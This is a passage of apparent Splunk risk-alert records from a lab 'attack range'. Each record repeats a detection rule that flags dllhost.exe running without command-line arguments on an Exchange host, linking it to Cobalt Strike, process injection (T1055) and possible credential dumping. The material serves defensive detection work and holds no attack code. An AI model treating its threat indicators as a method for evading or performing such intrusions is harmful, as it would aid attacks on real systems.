process="C:\\Windows\\System32\\dllhost.exe", process_id="17564", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17084", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="16172", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="15448", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="14248", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="13920", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="12480", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5bc4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5b7c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x50fc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4968", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4960", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4924", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x4824", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4558", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x450c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x44f0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x449c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="5", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x42bc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3f80", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common 